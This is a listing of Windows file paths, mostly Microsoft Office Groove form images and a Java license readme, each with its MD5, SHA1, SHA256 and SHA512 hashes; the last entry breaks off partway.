C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

MD5 7d35c42c103870664c1395937302ef85
SHA1 1a06c8c5a2f893edf2c8f6ad7bdd6ccd7b027f81
SHA256 91087c3c38ccd4bd98aa8de8e4e115bb8a3e27b1887958ce97c39dfbd864969b
SHA512 bfab1bf7680a55a93c204ba2268f88cf08a02aa59d513a63606fca99c554e440b35605c772272688401f17e86ec44cb5e842bec361735b3c67663c34d1271460

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

MD5 569ad6fbea02fda902db544bfe5b560c
SHA1 b9f7d07750c1514bd3a81e24d5e621b942c68795
SHA256 d03a917333f025405ea893296bf0ddbf1e61600cab48b9bfa53353548cdf811c
SHA512 b76a5d688a219dd563c3dab59e3b0b45315a19eb0e55ee4bf0c95287864978e40b90575e008a3f23fc6014894273bb0cfa728a14f6b2c800605d3900d6a2b079

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

MD5 3cedc7540fa583e9f12a2cfa2e1ee434
SHA1 d318f6fa6db7837b9bd55962d24eea333bd12273
SHA256 7775255f9bc33571b3d4b4aa598b27938391a7ff334fe88e268cd7636ef8653e
SHA512 497dac219a581ffebc33af36864f323fa550e67c0b5c5fac835600ca5e4a5e6f56f2c1ebb5ec26b4b8413e2e72191faf7207c0ad712403b0edcd26169ee9ff73

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF

MD5 413f5698d7156e6e32a284ebe6e5ac3a
SHA1 8896785394896e21b46dda93f984660881cf491b
SHA256 962e28a7260f7d42b11fc8be92cf992d721addb7567f201b1154a2d123b51467
SHA512 04474fe2aae603b89e36e7e93ac3bf2580cbb80e74228439eac774114af20b4b1771f7c0d31fa2ec817fe355c7c9e6066903823e303dad1c2c4840c8f83db0e5

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif

MD5 d117292646a12453e7b5582cc4a541ea
SHA1 d7ef02e44ce9ff4500ee8aff2173e34ff62e6a7a
SHA256 fbd8ec4929d82b0e7c6c581fa88a343028d988e94f9d6422f03b1f062535ae65
SHA512 8b6d21e86c55ca89a7e6f9ad4eead783528c4d4cb05c7b5a418fcfd99b7b095a5ca7e2af8522d5683abb88b18ddbf081887597e9a17352fdf2de68cdc150d699

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif

MD5 8aad792af7373ee17d92cdfd2d7a2ac1
SHA1 65661b9430a24792c8eaf561aea97f906579a88f
SHA256 2d969b3affb3a6551191abceacffd3adbaa713843e3eccfdce6a07b1993784fa
SHA512 8f797b4594f9b8c94b66286c0bf2583ffb3a390f061753820035c5ffdbefcc5bf04e8707938a9ce88ff601899671ea8edab005258e3802bb5fa1a3e37b20d19b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif

MD5 f63b67c513817864ecd976a89e19fc99
SHA1 49e4847df6b91c47ea2d03872ff4713e951c2d9a
SHA256 89a05d288f89e82b79f64691aaf3d8fa8205cedd768b9b1904503c638323ff72
SHA512 c60cbf149c24b4766c6e06bf5b2e8ebcad3706a1ab255c668ad0d944f53492e609c0c87f4f2229255ea07c7c01fdb948387cdc7538fa8bf4e6fcb0f10ee62e27

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif

MD5 7848bdf44fb668d78d19a4d3ff99948a
SHA1 69323c631a1187c24add7c3cfe259bf0b1f5b7d8
SHA256 abf988892540b7e9179da9f763464d12f65e24f3503cad35692d656896ceb5e5
SHA512 fd6b9daf56d3a5cef8a7f9803d345268dbd0588a6b3cae55e0750451daeaf47d52b0c5a41d828a124a940dff25db27b6fa2d07fde45da7a23cbfa3d0d05348b3

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif

MD5 f8b4416ac2848fe0262e5f4b989bf158
SHA1 d4d8d9b7e9b38edd990e3d6013d4c8aec5fd8068
SHA256 b4cf2ee8894287ba0f3da5a85247893e5519e2e3d977db3edc0c7f9c29bcd618
SHA512 c9ba07dafc1a9ea0604bd18d8ae195deec11eeb7398447fe137fa36785ea902631e641674370c53b4cc37d4e32d10c8d744f67a74795ddc5481778e9df4fe188

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif

MD5 b89eeb5c362155dd26dcdacd12eaad5a
SHA1 bb5fdd503b81c24210827024085b029af5883213
SHA256 a0ab011d0e97f1da97658b8653620892a06c347d226de1abd88df75c1463cb1a
SHA512 6a9ac284f3122b2be257f22d3e3d4c863a7b1c4ce515a040e8078985967d63366e321a964e57fd3d7c2b51b36a36c1a8f2039e7c5864043623ddfae40e5fbef0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif

MD5 becb69d0debbd5cfeb4348432a3816f9
SHA1 43c10881308a29f33e28d806f4954fcb08c10200
SHA256 f44aea688e58a801f9c394c945d514d174529132a7a86fbbb5474c331faf7123
SHA512 aa936d041cd64e183abbb80214c362472ee379b8fd372a732fcff4d89502d398146bf37d665799acceafc8ba434e941248c2421a431225c2aa4dcfd2ccf5b202

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif

MD5 6dfba97a2239211be4ce12311dbcb20a
SHA1 fb721cb7ff575a19def531dd08b9db8fd760763e
SHA256 eba9f474b3243e0309793f66cbf356e68640828ebbc7bf125a420813e16fd860
SHA512 e455f19ec41d2349646c2df21b09e657e36084cf230787cfbcd0ebe600e889bcf505af883795078520277c0ce2b1e099e22c54eea8c36c8edfb5f07331ee3a3c

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif

MD5 e97f409fe50921ad87b82e5c877c705a
SHA1 415311d6ab339f272d2adfbb55408abfcdc68ef5
SHA256 a0ffbd052c685fcdf32375f68f4d99606d1edc910ddc693dfe2af5130452a633
SHA512 2c3157637c5610e97add6aea20f8e38da0cc6ac36df4084c5f6b51991e340d0ee31ec7426b897e9fd2d3208026686580b924d806f0f3f79548e108796b5cb319

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif

MD5 7e38398ce1f75907facf403527a5b342
SHA1 2c19cf32ac42b4a259fa7c47f412191f3554a481
SHA256 82d74d54fc3c2a0d40be21921f49d4e7b2a47c0f46e38d4fd77f3dff9a9bc5ab
SHA512 0dd4f7890384636ced706b3bea2f963b4a19ebec48ed7c0b33917d11e3802821538442aed25409823fc324a9de7c104088e96cb951cd39121c8ee5338d0ae689

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif

MD5 e342d4765ea16cdc376a58a868745fc2
SHA1 4b50252df504aa51c8f5a3d713648619bd93e74e
SHA256 446e8c47cddcb93f79d1218a97e6b267050b86df8ae9a4565e6efb12711d6e14
SHA512 02a28490046b799bbdce3285894cc68f306616e5a97904ee304693748629eb9de6fedfcc868349a807d174a127a8ec9733b595d6d194a8deb163818a1752619c

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF

MD5 434ee0ea5621a2d4e75750c75f288267
SHA1 8c1177427b634a8c94337377ae8f34d9cf125724
SHA256 cc57f6eab24b757da1bca26b58b93f3bf08c6e1d9fe91f269661ff228c3f195a
SHA512 9ceafd4a1f8cc39413dbb58fd823c3e003ffa2f7450beb5352a0f941efc6452e22a5c83dc6fcadebde8692b6fd7061764b669962214f8be128dbab07d775067a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF

MD5 7e029d065181cd5ce332445de3732ee4
SHA1 afc48efbf0344469c2e6b65029b2256771c496e9
SHA256 f0da052928ffaecf2eac9666e11692ade253cedddcb9c5a7df71f36888f19d44
SHA512 d094ea99e9880efe9f25ad2785611ec4b4ea954564871ca8d0000b0057b9690e309d9d24191d1351ea3fedacca7b1cda70205a13f070771684d4911bab61c379

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF

MD5 b6a2ee171339aacafbe7aa423568d15f
SHA1 51db6840c08f0dd702685068ca97cfe7ccc40e09
SHA256 35364a7f17794be0caf01c7ef54b2d237f3b6a1b3765ded6b8e32fb1a8fea9a9
SHA512 3d7daf38dea43cd09e0dc007e377c5be5a17ba5a6353e2156a7dbb422219abfd7b48aa95b1446a5c0c5f9608ccb4b4c091a77c35d0244ab52f6cccc7f84628b4

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif

MD5 ed6b16a2d7c028702da21a075eeb4065
SHA1 7e3b98450fb95f470dca1c1a21937598d8e1afea
SHA256 caec3b77223d5e67dde35120ebfbe0ed823c16455eab8d772d74e8be86ef1b1a
SHA512 5765a71b05811175f9674e5ed99ef83fd040695a39f684de880d489f4d6d61ed25166ddcadb7dadb272916d074068cf26afcfea644c01f8b5f7ac9e173159b91

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif

MD5 7f9e5d2e08644851da3a582230721799
SHA1 3c6f22e4bdf44ec9681faf81617d06dca8686146
SHA256 a615873fa51e849cf148ec7c36411a00a543e1fa2bece4f78c9555d3b8c79e1c
SHA512 c8f7ac5fc1005801b1a1ed24126226c12f527a7169ce14b252f2d94f0d6119fdb600be72a84972ccd0faf103add1522e08a498360b89fa440a576fa9724494e5

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg

MD5 82310c2b6b582711cf32f43adf01df11
SHA1 3ccca099556a3ab2bacbfd7c987cfe92fdf09db2
SHA256 84309e7787cf809df432ce767ce8326cef6468eea45122cb9e90645d02f53618
SHA512 4e787bd3101f3588370392b5fc62e964fe0c65abe6d1fc85b5bb9fd7c7927bdee2416cf0eca41c0eeeb8e046b04974d8190e3b16ad326c04fca16beea3975486

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp

MD5 4f1ea8c5cb8b63701a7c550fd0a2d641
SHA1 219d7747243b6e39ceeac99a4ca3f16b24a0c2cb
SHA256 6cb2c6fd69d641f6796cec6451cb2f634c2a6a6fb69d7e2f8dc7450bff740171
SHA512 1eba282d233ccddb7215b73abfa2c1971a82daca7d39994670fa0f988cf0a6d08541cdf5c9de7f58f58c8e22e195be803c9c35e15a8b181b329dff31c5be7755

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif

MD5 8dd14b363a9de14862596b9ce71368e0
SHA1 45370b69844c3b5f048edaa3bdc255a118568524
SHA256 c3184b9717c980033f4d9438eaa7737d75d399fe9a8934eef2a443a647c7908f
SHA512 74cf54f63841fd810a6c5a9bfaa479f37f43179bb393bfc9cf1c44676f27483d26b4c68f78e223761c6020f16f745f2a020d08dd37bdea4c9217eddaa015674f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif

MD5 dc5a2dfa5a8ac342b19bda194e8737fa
SHA1 1e5c5c6b1e1208e93b680dd95c7a248fa93e233c
SHA256 fa4ca65120365f39240bbcfe857f6b5ae83f47b86260e43cf1929716449355e6
SHA512 d0b676973f11c17139fc294986c91894831496dbb4c18c29d8debb6e561ad05545ee6935b5d72325a773cfe19970f6996a9d8abf86972e15940f0cdace820c5a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF

MD5 0a7cab8b4d1f9da2b8bb36befffd751a
SHA1 bc75498d72b6e3019f573ed26ad2bbf3e7d94e59
SHA256 084e2126815cc2e686b87f2da1731601106ed3a84d2955523496516b9e6eeff2
SHA512 cafdbe01802d61dff8d1be452541055476e3e2543d4b4e75b1964d93350d50dfaee81078095434b30abc0f9057600d581f97a04ca5872e5eb47f26ff3257e167

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif

MD5 64e4c9ea5fb23f06009aa5b16ca087fe
SHA1 2befd2dae6dfe6f2b53d6c949f75c7d93d28c509
SHA256 05ba7c709efd20351b792b216ccc88e7bca3a22432a2b04e4632c6459dac827a
SHA512 e7f5b5d35921247e20a84dbc2e0e7f20df2fad2b283b7982346a428702b4f3eac97b520f31e01491ba19574f174eaaba8a6eae684532a4a93a753d2495990b20

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF

MD5 ac6b94d770877ec5f57e1abac16a682a
SHA1 6b421c03ba819952c4d650ae3dc0dbf3dd057227
SHA256 650a913ef0a8e29160a443b128a1d77cd95742d19f15b53ea83783a5faeeb360
SHA512 bf476a191201a5835af60dbe7f9b7c60e219ab1129d10020759a4bcc95c9e66353a5592ddd213fecd13a3a8e3e08d8edd323a78c0e410a1ca9e85a6c5a7a3c36

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF

MD5 2b29edd6506b9435d6b4af7476c94303
SHA1 27e6e37ee7559b5cd2e2c5b70fa4b4e45598d603
SHA256 2789bb4858a36c51d6759d2dd411821fdcccf3667c235b8eb6396e4b631f3c9b
SHA512 7eae5f9545f8c76c37724a7820ccd7d4e761279197ebabaeb078ec4a235730e1746af86ccb5dd07036af8889049122c09cd242bd700ef11ccdeb4443c4d44190

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF

MD5 b3bf57d56e13eaec75043f1826276ead
SHA1 d58e7d4850ac3a1c9f265a97e6436339cfb94ef5
SHA256 0dfaf18a41e2c90de8c5204db06080ecb6c86f273d97890dc94a5e2bc4c9bee1
SHA512 27ff9dbcf01b6f3d04b78a5fd6378fe0d1d2b1c4aec9b280ec3794ae537425181fc8e1d12aa6ba0e01acd9d9ef895bf100f5a206912c1a1df30bbf1bb1c3b8b9

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF

MD5 5065108a96e172bc58d5a4b24bcd323b
SHA1 c129ab1d48b024258e5fb6804c10510652dcc7e5
SHA256 cb2affb29f5f57a12478a60062cc12ba28d95b6655781bb11ca470ba58b137b3
SHA512 dd91d8de4784a66399fe05a49069ae4a29f81ef0fe901018d5dbd7fea0834df378dba5b3dc1b34d032770aaf8a67cf91310527d05c2c95dc3dcc07fa620903e6

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF

MD5 ecb89dd731d04c590242767099096a73
SHA1 66d44c139be116c4aaa486bbbd84f5ac3d1c9e42
SHA256 030c3618d3c1209e55d54188e39424513f574057eb51c9ae8a1a6fa4003ad4b4
SHA512 9fe32df7beb38ad8e4e4f889a44a1f3c3bd1d26547cd48c20145db7784d8ceabb6a6cde0da78d9645bbb9c1ce51021789db56dbfc161a432d088a8b070ab3bd1

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF

MD5 b97c027d670dac50ff38a6fd272d699c
SHA1 b2a3408cbe109a3386375a371ecd956f4898a970
SHA256 e5d19f9a22a5c55242e9111faeb692e3c094b86488244e503260f8d30bdeea3d
SHA512 9155ed41b28aae22af9fa7927a87aa041017ced319302c28c1793f556bd82ba4f52be767dcf0173afdbc49891e526f5e321c60640857242540ccf86a57375080

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF

MD5 d016a26367b394e93b76957a8b28e5da
SHA1 8075286903afd86c97eea771fd53f8a1794e80e8
SHA256 dad6796d6408d4312d96f6cbd40565f9f3886c20d1c62593cb247409119eb15e
SHA512 2b6eaaa021957bef48d20c8fae086aa03df77ddf91dd161d744c107292c2b79592d400a94d64f526409c2e6969fd026a24199124ec2f331479217e338efed8f0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF

MD5 9f244ba81e340d66127f3a4a07519b7c
SHA1 4656a5d4f7ebd4b05e5ea0cd7db8cbaab000bafb
SHA256 cba8950a0356ed7e2f026360a38faee13bf88d2c1244ceaa870573b4ee8886c6
SHA512 e6a728587456910eababba2eb1dd653ebf1bf6f67cc36898aface302a97058a9830d598550a5869dd3430eee74f8d9808030c7693810cf563cb6ca89e2ce59bb

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif

MD5 05055763f935cf9022cc828e886d1b37
SHA1 be8ac646f90c04a359306e303fdd916c3bc8733d
SHA256 46e5348391bfcdffa4ea87886f4995d78ee15b351798138d57c892afd0f243a1
SHA512 63d0bfe32aca403a2e818ba66881179253accad04497967dbb060d01b7099cf3ba9b68fd1d956f34ca0df51c7075ec94184685919d0f62cc4b62d9dc679ceb85

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF

MD5 6fe334b032c45292ea4b278f082a1fc3
SHA1 d5cba29ca26e54d9a7471d13575a5a98e7bb9e77
SHA256 e93c2e049a011de6c8eb05dafb8782559a7021fa85d5a0eef0a7ffa14ef1b7ea
SHA512 ef2634860e55bf704b9aa5eec61323129d7ea20767bb27b4b91fdd10e2a877e4612bc6c59f5c11c3b2d7456160fa9b2e5e7b6a05f72dab8041e3d47986f5de7c

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif

MD5 4ddcb9ceb0422700f279f7a6b1a24489
SHA1 76006db0ba40b28a68d934f3239273ca9ba19730
SHA256 01cce9d875687d0965e12ad61b5c9ee699b716823f2b138c5fa838d8a8849718
SHA512 b15cc91d1acc87320eb0d2ba28f8b7399d2030184e98c7dee56035372baa06f68faff78b60b3191dac78041823050cacd5f601d816c7369ec8f542a26bac0542

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif

MD5 d2a8c97ca2d2c4c4d11ec45ad9cdd162
SHA1 d1864e46f6fa62cf19a5b72701a4999e36a71c23
SHA256 920f90f0f6e45bf2a079af8797a5f01763d041a705de4d47d2deea274f820ba8
SHA512 d37b65b00e480b28260d7cca0d39b0a293cbeab9d7f190bb8c4034656fcfbed4919cc92c7a4adee0a98a4213c77efb62f86031b0490eae5f803bc245f32a9cff

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg

MD5 37febaa62b7bedfca2f7f6824d8816b5
SHA1 66020c80a557cd954138856ea8e28e804de63407
SHA256 8fdaf011d7ae41f012680db4a45c563e99e6eb7707872a26602f0250b49bb47d
SHA512 97295d53b936954f1ab956bde8c08112e393cc363c605d5206a291e8e00ebd8913aadffa9426171a59298f919ced69197d07ccde4d8d7d198ec93cbac730c79b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF

MD5 f109f35c72d658e5e8419128a642dc9f
SHA1 dab7dbff1c12e8dbdbfcad60939d4bb07c237c88
SHA256 4cbdbd14d5692e0d2e764e5d86287fe67291fdf8c7bffecc19b2aca58f16a216
SHA512 9c8dee71579cb8f5c7a00b0ea5e40c3565e8213c009683105a9c02fef1ce73627d479ab9f350ffccea17439f6e6ef878c89f9ada8253a509575fbb0285fad0d5

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif

MD5 2b3a351fc1ef8d22c6c479ead02a52c9
SHA1 b0e41a386a39b25e958fa39cf82905877c0b43bb
SHA256 8d7fcff9f9d7cbdb8d8cadebb352fb393df46ed7763cbefb11b9003be9070552
SHA512 16fec2a6249aca41a265be066ca018ab2a1aecdc431d77c22868ff889855b74f0627d184ad3df2108aac21e6ef216819d224a46df42f6e3e3855aa646f8c223d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif

MD5 067138b7f15b3c53d2b9ec736836ad9e
SHA1 85620c9203ed84975a6e82a47584b6d89850f635
SHA256 ea551a7e47b2e92fe16e1b6e05a014c47a4a5aa94ae7d876b00a7bbbe0a7cbe8
SHA512 bd418b50235591597e1af6fa179b3f56be9ecc00cfcaf95f114a089fab8c3f368fe317fc915339dfbcd0482fe595c9120dea02848c2e6a10e07518c5459ae661

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif

MD5 729eefa7f3c9df72ab8789eb26746cf4
SHA1 7196ca78919f5e9cbecb64d37a6cd0274b85784c
SHA256 3a42b4da4dfc773e9ff718c9f56ac47afb199ac7144bc5c4b18d72a8b6adce2e
SHA512 e85aec599cab2b79a919e009904ee1dc9e380955a0fd92d458cab26693adc839e216e717a5b6ac92b5fee9834e55484aa7e0eb4ee4b289c1af877eb0c6a73980

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg

MD5 67d2cab16794af766d73720d37706ff5
SHA1 e2d0b02fd00391e7092fe7b9a1a374adba299769
SHA256 b55be416bd431358ee3bb090602b2fb165eb3a7d8e6b29116c6269ce99a2cac2
SHA512 c5768be778634b7b7b6382e3d29b5662da6b2c32a0370c36f2b5cd0c3dda120c2d79e4e2e450cd96127c020c9d7be572935a0f023409d39892cb27e944cf5131

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF

MD5 3e65edcfffd8b441d446ef9f36f16e07
SHA1 de6d4b69d38dc7930160bd305af3c40250b0cfa9
SHA256 d7f52e2d9b644bf5ddfe71895ec2b95b85e4d3bef426732e8c5e965cb26f9681
SHA512 6a34640d07229ef00865a398d524a40adf8a4dd8e6cdf73ab0f0558cd8936b021b66b63c9aab955ecafef618a5d211201606583b0c673f1efbd479a8fec149bc

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF

MD5 7ffcd7c88241805145b673f1e526c5b3
SHA1 6b72a498a4652f1018368b778537f778a59e3224
SHA256 50a5af23fc23222216cad62a468403e541de6fcb1e76083ab29bdfe332656da7
SHA512 2ba30519937941dcd8a0001261d6775edeb57a8c35dd09c72a3a424c6e7b90acb89c132e09fdae9f1c00fcc728cb545c13f0fa37a9ef6e45708337ad88bc0991

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF

MD5 e2b360b774cebda8933a8ecd2d1565ee
SHA1 2c9b0c94143b0d4208b5deb3f2138e0dd9ee4034
SHA256 277290a5c358446b8a3ce2a6bc49afa1140ebbd68105d5b6a9bec1e389f31330
SHA512 93aaf67a5387b89794e1240a860c94443e4f23ba4adb8936429c499d345806bb8b400f1c8d9b769c563f8b3197d8f6db580e78efa09d221bdbdc70fb41d843cc

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF

MD5 1131d847dbdcc6399ce2cad9f9433d83
SHA1 3cf6395104b2b81a3c0f05f4f9d7cc89a6024bdc
SHA256 1a4f999bc43204e837f62700a44fb7b3f1028c84feb075199984c068660da047
SHA512 45afa4809d9ff89b968e3474981249f4df511935a39af53658ef3b3fae9125530f6522acb96bdaf082fa85f76378891f01e78d5807e6aa939a44173edd9efc72

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg

MD5 4316e34986c15229a1e0d47aee37a3d2
SHA1 3c31a79bfabff07e7e4288960530f8255babd9ab
SHA256 ee0c2b31b15d682b4513808ba85489954d5f2c050d2cf08e2a0b38af0dcd0968
SHA512 43d9fcec25fe8462cd62ed6bf4511c22f989ed132064767477dc7bb2da91d554ae8f0f21fdcc59eefee0025c9362e6a85e1fcdd422dfea43f11a76f77761abac

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp

MD5 42ea7c2d80bec8f2f0aec12d4c9f7123
SHA1 e7f713d5295f16fc4092628987019f132e1ffa3b
SHA256 1300c1deeba7598355f15c8dbf772681cf0b39db1a50c3c856ed3523825a61a2
SHA512 1f711613ab90dd88fba19fd9b5a5cbab0f9c6577c4dcd193027e47e861baf288c2afd822d0ffa6c6b2544f1c7f030ea721a65e77e7b0f05d877b2c5639c17df9

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF

MD5 6026500b980644fb2ddd4759066f7235
SHA1 d0798c5324a45f3631279b0ef16a82bd5f2b5c49
SHA256 f75e56447f1e7eb82d6ba2c9d871c59dabcd28131b7920d17a63c3e31caec2ff
SHA512 d4eb7a75220c842aafed03a0f432194c7a959d367b7abe2f6ad1acfd6211e9b97bd9abb82c30aa75b65813285f3d763a169249dfac6fb5e8cdeaf260d05f493a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif

MD5 53cf053a784ec5d84956451fdbcd8572
SHA1 32e32cd92beb21246452e905a263bdd1c2616795
SHA256 abe7964debeadc49e74ac5cb8a419d63c11a0fc63fb5680c2a3cb32048b50a17
SHA512 c9839a6406697ab6433dd69d9ad9e04e819b935563b06de8d21b04e8d0ea82476dfd2a07c58618ab2585df65bbdd5578eb364de7875a5962d7b98d038815f2f5

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif

MD5 c6059bd4a2858783915f34ddcce4b357
SHA1 2f94eeefe095132784b1f0bea8eebc0fa6341f97
SHA256 2db2eae502223835ab9eb915a04c1d1dc22a79220006f6ecd67db04ee3dd4d8a
SHA512 746c7babfca5e6471d1b7cdcd79f25101b08d36a2e88bbc9b221fef7f0dc2425d1d58b2a137f943d00ddd371dd2aa18abb409908bf93ab15536ea57f8d2dcca6

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif

MD5 d045c84721790c42c37d84d486d2cf44
SHA1 fc4b5a554cd8714b3a8b55cabab2246ba609980f
SHA256 64254363e7bcd2c930bab64db2d7821f74d118bce7aab0ceed7af881c488f4f3
SHA512 b7a63165aa5e5ecec9252f5cd58f6c061a2336e2676eaf63d04ad17341ed5a07a5cc3d0824b1250ab9a473286de9f3bb5b59e8ffb06af384a5cf7a95663e4ca1

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif

MD5 fa254aae7d255330ae97025f6c052fbb
SHA1 16fc8cc9d9e4f6e4734193867a769bc7123366b9
SHA256 afa30e372b2961b31c6395dee4ce44e5bd4f2fd2f2bbd59e4cae6a63ee269590
SHA512 1f88a1571dfba579319d1e1bb249bfce14654c69dc3d624a52ffbf4020e78ca92970f45243329510fe61f5b39283297b6482661ec2c51f3a58a1df4fb15c872e

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif

MD5 d873c6acdc5c1a2df5dff8366643d782
SHA1 cc17640c1a471925f09b543974680f9cf4e33dcb
SHA256 e4822a1444cfccba8c69803eacc82d2aa2fdf032467b18a97798e9df78763680
SHA512 5e9746e5b689ee6b2695d846197630f5072b4b97ac6aad033bdc1329f220f403156a7f06dda0e5da75fcd0cde272d7a4019828e36cb6402131a4482c746e490d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif

MD5 4a05e7d775ff5f5b6c259b63c9e1d415
SHA1 8c96a18d3f9b67e18aaf651b11283ea9fd3b8e57
SHA256 c013fab02c16dcb090406c3b4fda2f3edf9804939f6a5aba97b8654a749115e9
SHA512 fb1601b1f9e02845ccbbc3dc6b9688438a099dfa2365ecfc1fe1f7bde3d41066c53b29e2e72cbe0d7557e8dbbb23f1641c3debc29bc59670b0da7f68122086e0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif

MD5 8179db4bba39485b6249cc57062ced40
SHA1 37a3778094b2f4691919736398d47b34e7ffcd2f
SHA256 3756e5e9718048ba93b27d68c766369d2416744f07416dde964710176af2c9dc
SHA512 4928dfd5caa46d217ac394953e19f6e69d6209ea0d8911999c997b683a2bd732f3423802c1cce6ddf694387c41bca59c8ef8356fa4f869881990dc320245503f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif

MD5 64ec82436e45ef578009261bc50f147f
SHA1 5fd2c67fa09b94556700afc8316a87c6a7b5b83b
SHA256 41ef262e05a87d415c32792c8774d80bd993c3ffb6a9f3334b475abf6974d01a
